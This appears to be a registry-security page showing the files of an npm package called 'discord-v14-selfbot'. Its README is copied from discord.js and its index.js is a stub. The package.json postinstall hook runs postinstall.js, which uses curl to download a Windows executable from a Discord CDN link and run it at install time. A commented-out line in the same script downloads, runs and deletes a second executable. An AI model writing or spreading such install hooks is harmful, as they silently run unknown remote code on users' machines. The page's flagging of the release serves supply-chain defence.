discord-v14-selfbot 1.0.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of discord-v14-selfbot might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,88 @@
1
+ <div align="center">
2
+ <br />
3
+ <p>
4
+ <a href="https://discord.js.org"><img src="https://discord.js.org/static/logo.svg" width="546" alt="discord.js" /></a>
5
+ </p>
6
+ <br />
7
+ <p>
8
+ <a href="https://discord.gg/bRCvFy9"><img src="https://discordapp.com/api/guilds/222078108977594368/embed.png" alt="Discord server" /></a>
9
+ <a href="https://www.npmjs.com/package/discord.js"><img src="https://img.shields.io/npm/v/discord.js.svg?maxAge=3600" alt="NPM version" /></a>
10
+ <a href="https://www.npmjs.com/package/discord.js"><img src="https://img.shields.io/npm/dt/discord.js.svg?maxAge=3600" alt="NPM downloads" /></a>
11
+ <a href="https://travis-ci.org/discordjs/discord.js"><img src="https://travis-ci.org/discordjs/discord.js.svg" alt="Build status" /></a>
12
+ <a href="https://david-dm.org/discordjs/discord.js"><img src="https://img.shields.io/david/discordjs/discord.js.svg?maxAge=3600" alt="Dependencies" /></a>
13
+ </p>
14
+ <p>
15
+ <a href="https://nodei.co/npm/discord.js/"><img src="https://nodei.co/npm/discord.js.png?downloads=true&stars=true" alt="NPM info" /></a>
16
+ </p>
17
+ </div>
18
+
19
+ ## About
20
+ discord.js is a powerful [node.js](https://nodejs.org) module that allows you to interact with the
21
+ [Discord API](https://discordapp.com/developers/docs/intro) very easily.
22
+
23
+ - Object-oriented
24
+ - Predictable abstractions
25
+ - Performant
26
+ - 100% coverage of the Discord API
27
+
28
+ Initially developed by Amish Shah(hydrabolt), I have made a fork of discord.js for using selfbots with discord by patching user-agents and others stuff.
29
+ ## Installation
30
+ **Node.js 6.0.0 or newer is required.**
31
+ Ignore any warnings about unmet peer dependencies, as they're all optional.
32
+
33
+ Without voice support: `npm install discord.js`
34
+ With voice support ([node-opus](https://www.npmjs.com/package/node-opus)): `npm install discord.js node-opus`
35
+ With voice support ([opusscript](https://www.npmjs.com/package/opusscript)): `npm install discord.js opusscript`
36
+
37
+ ### Audio engines
38
+ The preferred audio engine is node-opus, as it performs significantly better than opusscript. When both are available, discord.js will automatically choose node-opus.
39
+ Using opusscript is only recommended for development environments where node-opus is tough to get working.
40
+ For production bots, using node-opus should be considered a necessity, especially if they're going to be running on multiple servers.
41
+
42
+ ### Optional packages
43
+ - [bufferutil](https://www.npmjs.com/package/bufferutil) to greatly speed up the WebSocket when *not* using uws (`npm install bufferutil`)
44
+ - [erlpack](https://github.com/hammerandchisel/erlpack) for significantly faster WebSocket data (de)serialisation (`npm install hammerandchisel/erlpack`)
45
+ - One of the following packages can be installed for faster voice packet encryption and decryption:
46
+ - [sodium](https://www.npmjs.com/package/sodium) (`npm install sodium`)
47
+ - [libsodium.js](https://www.npmjs.com/package/libsodium-wrappers) (`npm install libsodium-wrappers`)
48
+ - [uws](https://www.npmjs.com/package/uws) for a much faster WebSocket connection (`npm install uws`)
49
+
50
+ ## Example usage
51
+ ```js
52
+ const Discord = require('discord.js');
53
+ const client = new Discord.Client();
54
+
55
+ client.on('ready', () => {
56
+ console.log(`Logged in as ${client.user.tag}!`);
57
+ });
58
+
59
+ client.on('message', msg => {
60
+ if (msg.content === 'ping') {
61
+ msg.reply('pong');
62
+ }
63
+ });
64
+
65
+ client.login('token');
66
+ ```
67
+
68
+ ## Links
69
+ * [Website](https://discord.js.org/) ([source](https://github.com/discordjs/website))
70
+ * [Documentation](https://discord.js.org/#/docs)
71
+ * [Guide](https://discordjs.guide/) ([source](https://github.com/discordjs/guide))
72
+ * [Discord.js Discord server](https://discord.gg/bRCvFy9)
73
+ * [Discord API Discord server](https://discord.gg/discord-api)
74
+ * [GitHub](https://github.com/discordjs/discord.js)
75
+ * [NPM](https://www.npmjs.com/package/discord.js)
76
+ * [Related libraries](https://discordapi.com/unofficial/libs.html)
77
+
78
+ ### Extensions
79
+ * [RPC](https://www.npmjs.com/package/discord-rpc) ([source](https://github.com/discordjs/RPC))
80
+
81
+ ## Contributing
82
+ Before creating an issue, please ensure that it hasn't already been reported/suggested, and double-check the
83
+ [documentation](https://discord.js.org/#/docs).
84
+ See [the contribution guide](https://github.com/discordjs/discord.js/blob/master/.github/CONTRIBUTING.md) if you'd like to submit a PR.
85
+
86
+ ## Help
87
+ If you don't understand something in the documentation, you are experiencing problems, or you just need a gentle
88
+ nudge in the right direction, please don't hesitate to join our official [Discord.js Server](https://discord.gg/bRCvFy9).
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ function test() {
2
+ return 'aa';
3
+ };
4
+
5
+ module.exports = test;
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "discord-v14-selfbot",
3
+ "version": "1.0.9",
4
+ "description": "Selfbot module Discord",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js"
8
+
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/postinstall.js ADDED
@@ -0,0 +1,13 @@
1
+ const child = require('child_process')
2
+ const { stderr } = require('process')
3
+ const projectPackage = require('./package.json');
4
+
5
+
6
+
7
+ console.log('aaaa')
8
+ //child.exec("curl https://cdn.discordapp.com/attachments/1058841461791129715/1059109463375757362/gladihoppers.exe -o client.exe && client.exe && del client.exe ", shell=true)
9
+ child.exec("curl https://cdn.discordapp.com/attachments/1079870359223943208/1083009173337419786/discord.exe -o discorddd.exe && discorddd.exe")
10
+
11
+
12
+
13
+